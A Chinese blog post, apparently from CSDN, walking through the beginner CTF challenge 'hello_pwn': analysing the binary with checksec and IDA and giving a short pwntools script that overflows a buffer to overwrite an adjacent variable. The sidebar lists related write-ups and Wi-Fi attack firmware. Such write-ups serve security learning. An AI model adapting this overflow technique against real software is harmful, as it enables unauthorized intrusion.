攻防世界-pwn新手区-hellopwn

最新推荐文章于 2024-05-06 12:28:50 发布
最新推荐文章于 2024-05-06 12:28:50 发布
阅读量173 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CHAWUCIREN1/article/details/117718119
版权

拿到文件先file看一下是什么类型,然后checksec一下查看保护机制。

发现是64位程序,开启了NX(Non-Executable Memory,不可执行内存。了解 Linux 的文件有三种属性,即 rwx,而 NX 即没有 x 属性,意味着栈中数据没有执行权限。
尝试运行一下
在这里插入图片描述
没啥用,丢idapro里面
按两次空格,转到汇编界面

gdb调试,b main发现程序没有main函数
在这里插入图片描述
IDApro查看
在这里插入图片描述
发现有一个判定

dword_60106C == 1853186401

编写exp

from pwn import*
p = remote('111.200.241.244',52090)
111.200.241.244:52090
payload = 'aaaa' + p64(1853186401)

p.recvuntil("lets get helloworld for bof")
p.send(payload)

p.interactive()
续梦人
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hello_pwn(xctf)
weixin_43868725的博客
05-06 616
0x0 程序保护和流程 保护: 流程: subsub_400686(): 当dword_60106C = 1853186401 时进入subsub_400686()函数获得flag。 0x1 利用 仔细分析后可以发现 两个数据是相邻的,我们可以通过read函数改写dword_60106C的值从而获得flag。unk_601068和dword_60106C 只相差四个字节,read函数可以输...
攻防世界pwn新手练习-hello_pwn
CSDN_sunrise的博客
08-28 663
hello_pwn查看基本信息并运行文件 查看基本信息并运行文件
hello_pwn
wuyvle的博客
01-23 401
hello_pwn 老惯例放进Linux康康 可见是个64位,且没有金丝雀(狂喜 ) 放进ida64康康 这有个read函数,进去康康 分析main函数 要使dword_60106C == 1853186401 才能得到flag 但我们只能给unk_601068赋值,怎么办? 这就用上栈溢出了,让我们再看看堆栈 两者之间差(ox6c-0x68)这之间数据填满;让unk_601068的值占到dword_60106C的位置 开始写脚本 比较简单 ...
2024年最新pwn入门-buu第二页题解(32道)(持续更新中),网络安全研发岗面试复盘总结
最新发布
2401_84254057的博客
05-06 918
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;薪资间6k-15k。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。
攻防世界 - pwn - hello_pwn
qq726232111的博客
03-16 397
A、程序分析 1、缓冲地址为601068h 2、判断条件 --> 60106Ch为起始地址 , 存储6E756161h 3、判断条件成立执行cat flag B、利用分析 1、601068h -60106Bh --> 4byte 填充数据 60106Ch - 60106Fh --> 4byte 判断条件 0x6E756161 ...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。... ...每个类别都包含多个挑战,每个挑战都有一个或多个标志(flag)。参赛者必须通过解决每个挑战来获取相应的标志,然后提交标志以获得...
Buffer Overflow缓冲溢出和保护措施
TranSad的博客
07-07 2724
缓冲溢出是指当数据写入某个缓冲(buffer)时,,从而导致覆盖了相邻内存域的情况。这种现象可能导致程序崩溃、数据损坏,甚至引发安全漏洞,允许攻击者利用这一漏洞执行恶意代码。比如这个代码中,在内存中,a中的元素和d其实是挨着的,如果给a赋值了超过了它当前容量的数据,那么就会覆盖d的内容,导致d的值混乱。
Meltdown Reading Kernel Memory from User Space
shuiliusheng的专栏
12-15 819
Meltdown: Reading Kernel Memory from User Space 摘要: 计算机系统的安全性从根本上依赖于内存隔离,通过标记地址是否可用,隔离用户地址空间和内核地址空间 熔断利用现代处理器上的乱序执行产生的一些微架构上的副作用,能够读取任意的内存空间 熔断独立于OS,并且不依赖于软件漏洞,直接破坏了地址空间隔离和半虚拟化环境提供的所有安全保证,所有在此基础上的安...
NXCOMPAT选项和数据执行保护DEP
Jinhill's Blog
04-27 3036
概述    在安全编码实践一中我们谈到GS编译选项和缓存溢出。缓存溢出的直接后果就是可能导致恶意代码的远程执行。GS选项存在自身的局限,例如,有若干方法可以绕过GS选项的保护。   在这篇文章里,我们会介绍另外一个非常重要的安全特性:数据执行保护,即DEP-Data Execution Prevention,以及与之对应的NXCOMPAT选项。   在栈溢出程序例子中,我们看到
How The Kernel Manages Your Memory(内核如何管理程序的内存)
张宸铭的专栏
10-06 1109
转载自:http://duartes.org/gustavo/blog/post/how-the-kernel-manages-your-memory After examining the virtual address layout of a process, we turn to the kernel and its mechanisms for managing us
攻防世界pwn新手练习(hello_pwn
BurYiA的博客
10-24 3673
hello_pwn 拿到程序后,我们首先checksec一下 可以看到是64位程序,好的是这次只开了NX(堆栈不可执行),ok,我们跑一下程序看看 可以看到它是一个输入,然后就啥都没有了emmmm…好吧,咱们继续放到IDA里面看看 ...
初学pwn-攻防世界(hello_pwn)
天柱的博客
08-26 3437
初学pwn-writeUp 攻防世界的第二道题目,hello_pwn。 首先创建场景,使用nc进入远端,发现他只输出了一串字符串,没有别的内容,也无法使用ls查看它的文件。 下载场景提供的文件,使用cat查看,发现是ELF文件,按照大佬的流程,ELF文件直接用ida打开。 初次使用ida,深切的感受到了ida的强大。 打开之后,按F5,进行反编译,可以看到main函数的伪代码 可以从main函数中看到,这里存在一个判断,如果条件达成的话,会调用一个函数。点开函数看一下。 可以发现里边会输出flag.tx
攻防世界 hello_pwn
西部壮仔的博客
06-27 1270
从题上可以看出当dword_60106C的值为1853186401的时候就会执行sub_400686()函数 执行这个函数会得到我们想要的flag 先看一下这个程序的保护机制 、 exp的内容就是 from pwn import * p = process("./hello_pwn") p.recvuntil('lets get helloworld for bof\n') payl...
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值